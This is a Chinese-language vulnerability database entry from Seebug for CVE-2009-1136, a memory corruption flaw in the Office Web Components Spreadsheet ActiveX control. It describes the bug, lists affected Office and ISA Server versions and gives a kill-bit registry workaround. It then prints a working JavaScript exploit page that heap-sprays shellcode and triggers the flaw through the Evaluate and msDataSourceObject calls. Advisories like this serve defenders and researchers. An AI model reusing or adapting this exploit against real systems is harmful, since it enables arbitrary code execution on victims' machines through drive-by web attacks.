Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:11804
HistoryJul 14, 2009 - 12:00 a.m.

Microsoft Office Spreadsheet ActiveX控件内存破坏漏洞

2009-07-1400:00:00
Root
www.seebug.org
16

0.967 High

EPSS

Percentile

99.6%

JSON

BUGTRAQ ID: 35642
CVE(CAN) ID: CVE-2009-1136

Microsoft Office是非常流行的办公软件套件。

Office Web组件是用于向Web发布电子表格、图表和数据库的COM控件,其中的Spreadsheet ActiveX控件(OWC 10和OWC11)存在内存破坏漏洞。如果用户受骗访问了恶意恶意网页并向该控件,就会导致执行任意指令。

目前这个漏洞正在被挂马攻击广为利用。

Microsoft ISA Server 2006 SP1
Microsoft ISA Server 2006
Microsoft ISA Server 2004 SP3
Microsoft Office XP SP3
Microsoft Office 2003 Service Pack 3
临时解决方法:

  • 对漏洞相关的控件设置Kill Bit,对漏洞相关控件设置Kill Bit应该不会对系统造成太大影响。

设置Kill Bit,或者将以下文本保存为.REG文件并导入:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility{0002E541-0000-0000-C000-000000000046}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility{0002E559-0000-0000-C000-000000000046}]
"Compatibility Flags"=dword:00000400

微软已经提供了一个工具来完成上述操作:
http://go.microsoft.com/?linkid=9672747

  • 暂时不要使用IE浏览器,可以使用Opera或Firefox。

厂商补丁:

Microsoft

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/technet/security/


                                                <html>
<body>
<script language="JavaScript">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF
%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201
%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B
%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868
%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8
%u6873%uFE98%u0E8A
%uFF57%u63E7%u6C61%u0063");
var array = new Array();
var ls = 0x81000-(shellcode.length*2);
var bigblock = unescape("%u0b0c%u0b0C");
while(bigblock.length<ls/2)
{bigblock+=bigblock;}
var lh = bigblock.substring(0,ls/2);
delete bigblock;
for(i=0;i<0x99*2;i++) {
array[i] = lh + lh + shellcode;
}
CollectGarbage();
var obj = new ActiveXObject("OWC10.Spreadsheet");
e=new Array();
e.push(1);
e.push(2);
e.push(0);
e.push(window);
for(i=0;i<e.length;i++){
for(j=0;j<10;j++){
try{
obj.Evaluate(e[i]);
}
catch(e)
{}
}
}
window.status=e[3] +'';
for(j=0;j<10;j++){
try{
obj.msDataSourceObject(e[3]);
}
catch(e)
{}
}
</script>
</body>
</html>

Related

saint 4
cve 1
prion 1
zdi 1
securityvulns 4
d2 1
packetstorm 2
checkpoint_advisories 3
nessus 2
cert 1
openvas 2
mskb 1
saint
saint
Microsoft Office Web Components OWC.Spreadsheet Evaluate method vulnerability
2009-07-14 00:00:00
Microsoft Office Web Components OWC.Spreadsheet Evaluate method vulnerability
2009-07-14 00:00:00
Microsoft Office Web Components OWC.Spreadsheet Evaluate method vulnerability
2009-07-14 00:00:00
cve
cve
CVE-2009-1136
2009-07-15 15:30:00
prion
prion
Design/Logic Flaw
2009-07-15 15:30:00
zdi
zdi
Microsoft Office OWC10.Spreadsheet ActiveX msDataSourceObject() Heap Corruption Vulnerability
2009-08-11 00:00:00
securityvulns
securityvulns
FortiGuard Advisory: Microsoft Office Web Components Remote Memory Corruption Vulnerability
2009-07-14 00:00:00
ZDI-09-054: Microsoft Office OWC10.Spreadsheet ActiveX msDataSourceObject() Heap Corruption Vulnerability
2009-08-12 00:00:00
Microsoft Office Web Components ActiveX memory corruption
2009-08-20 00:00:00
d2
d2
DSquare Exploit Pack: D2SEC_OWC
2009-07-15 15:30:00
packetstorm
packetstorm
Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption
2010-03-03 00:00:00
Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption
2009-11-26 00:00:00
checkpoint_advisories
checkpoint_advisories
Microsoft Office Web Components Arbitrary Code Execution (CVE-2009-1136)
2011-10-04 00:00:00
Update Protection against Microsoft Office Web Components Multiple ActiveX Controls Remote Code Execution Vulnerability (MS09-043)
2009-07-13 00:00:00
Microsoft Office Web Components Multiple Buffer Overflows (MS08-017; CVE-2006-4695; CVE-2007-1201; CVE-2009-0562; CVE-2009-1136; CVE-2009-1534; CVE-2009-2493; CVE-2009-2496)
2008-03-11 00:00:00
nessus
nessus
MS09-043: Vulnerabilities in Microsoft Office Web Components Control Could Allow Remote Code Execution (973472)
2009-07-14 00:00:00
MS09-043: Vulnerabilities in Microsoft Office Web Components Could Allow Remote Code Execution (957638)
2009-08-11 00:00:00
cert
cert
Microsoft Office Web Components Spreadsheet ActiveX control vulnerability
2009-07-15 00:00:00
openvas
openvas
Microsoft Office Web Components ActiveX Control Code Execution Vulnerability
2009-07-18 00:00:00
Microsoft Office Web Components ActiveX Control Code Execution Vulnerability
2009-07-18 00:00:00
mskb
mskb
MS09-043: Vulnerabilities in Microsoft Office Web Components could allow remote code execution
2018-04-17 19:02:46

0.967 High

EPSS

Percentile

99.6%

JSON
Related for SSV:11804
saint4cve1prion1zdi1securityvulns4d21packetstorm2checkpoint_advisories3nessus2cert1openvas2mskb1